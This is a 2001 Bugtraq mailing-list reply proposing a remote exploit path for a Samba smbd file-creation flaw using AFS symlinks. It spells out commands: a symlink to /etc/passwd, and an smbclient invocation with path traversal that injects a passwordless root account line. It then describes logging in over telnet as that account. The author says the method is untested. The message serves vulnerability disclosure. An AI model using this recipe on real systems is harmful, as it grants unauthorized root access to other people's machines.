[21309] in bugtraq
Re: smbd remote file creation vulnerability
daemon@ATHENA.MIT.EDU (Christopher William Palow)
Mon Jul 2 17:22:05 2001
Date: Mon, 2 Jul 2001 11:15:29 -0400 (EDT)
From: Christopher William Palow <cwp@andrew.cmu.edu>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.21L-021.0107021108330.1654-100000@unix45.andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
I was hoping to test this out but haven't been able to so here goes on
theoretical...
How to make this exploit a remote one using AFS or other remote file
systems.
What does this exploit need on the remote side?? A
symlink; soo... on a AFS system ,preferably one of a well known node that
most AFS servers would have in their CellServDB such as
andrew.cmu.edu or athena.mit.edu, create a symlink to /etc/passwd named
x.log like
ln -s /etc/passwd /afs/andrew.cmu.edu/usr/<username>/x.log
now make the symlink world readable... then all you need is UNIXes running
samba in the vulnerable configuration and running AFS.
smbclient //afs.machine/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \
-n ../../../afs/andrew.cmu.edu/usr/<username>/x -N
telnet afs.machine
login as toor
if root logins aren't allowed make a dummy account first, login with that
then make a toor account ontop of that and su over to toor.
what machines does this really effect? Those running samba and AFS,
mainly educational institutions or other large institutions.
Christopher Palow
palow@cmu.edu
Senior Electrical and Computer Engineering
Carnegie Mellon University
